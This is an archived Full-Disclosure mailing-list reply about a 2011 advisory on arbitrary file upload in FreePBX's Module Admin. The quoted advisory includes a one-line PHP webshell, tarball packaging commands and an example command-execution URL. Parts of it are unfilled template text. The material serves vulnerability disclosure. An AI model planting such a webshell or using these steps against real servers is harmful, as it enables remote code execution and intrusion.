lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <BANLkTimCAJrWY7nZ-viuJQ2m0pZ5Ycx5gA@mail.gmail.com>
Date: Thu, 9 Jun 2011 15:11:43 -0500
From: Tyler Borland <tborland1@...il.com>
To: Tiago Ferreira <tiago@...igatorteam.org>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary
	File Upload

So you need administrative access to upload the file?

On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <tiago@...igatorteam.org>wrote:

> ====[ Alligator Security Team
> ]===============================================
>
> FreePBX - Module Administration Arbitrary File Upload
>
> Members: Tiago Ferreira < tiago SPAM alligatorteam.org >
>
> ====[ Table of Contents
> ]=====================================================
>
> 1. Overview
> 2. Detailed description
> 3. Other Contexts & Solutions
> 4. Thanks
> 5. References
>
> ====[ Overview
> ]==============================================================
>
>     * Systems affected: FreePBX
>     * Version: 2.9.0.6 (other versions may be affected)
>     * Release date: [Example Date]
>     * Impact: Remote command execution
>
> "FreePBX is an easy to use GUI (graphical user interface) that controls and
> manages Asterisk, the world's most popular open source telephony engine
> software. FreePBX has been developed and hardened by thousands of
> volunteers
> over tens of thousands man hours. FreePBX has been downloaded over
> 5,000,000
> times and estimates over 500,000 active phone systems."[1]
>
> The functionality Module Admin, available for authenticated users within
> the administrative interface of FreePBX, is prone to a vulnerability which
> enables an attacker to upload malicious PHP files, and thus, perform remote
> arbitrary code execution within the context of a web server user."
>
> ====[ Detailed description
> ]==================================================
>
> In order to exploit this vulnerability and execute remote commands on a
> vulnerable FreePBX instance, access to Module Admin (Admin > Setup > Module
> Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by
> following the given steps:
>
> 1. Create a directory like: webshell
> 2. Get a PHP file web trojan (webshell.php)
>
> Ex.: <? if($_GET['cmd']) {  system($_GET['cmd']);  }?>
>
> 3. Put this file into the webshell directory and create a tarball. This zip
> file name needs to follow the given rule: name-version.[tar|tar.gz|tgz], to
> our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.
>
> 4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it.
>
> When the file is uploaded with success, the path for accessing the trojan
> will be: /admin/modules/webshell/webshell.php.
>
> Now, the possibility for executing remote system commands is possible using
> the uploaded trojan.
>
> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami
>
> ====[ Other Contexts & Solutions
> ]============================================
>
> Description of a possible use case of the mentioned vulnerability.
>
> Ex (DoS): A potential attacker could take advantage of this issue to
> disable
> the services provided by [software/device] for as long as the attacks
> occurs.
>
> ====[ Thanks/Acknowledgements
> ]===============================================
>
> - Joaquim Brasil < joaquim SPAM alligatorteam.org >
>
>
> ====[ References
> ]============================================================
>
> - [1] http://www.freepbx.org/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ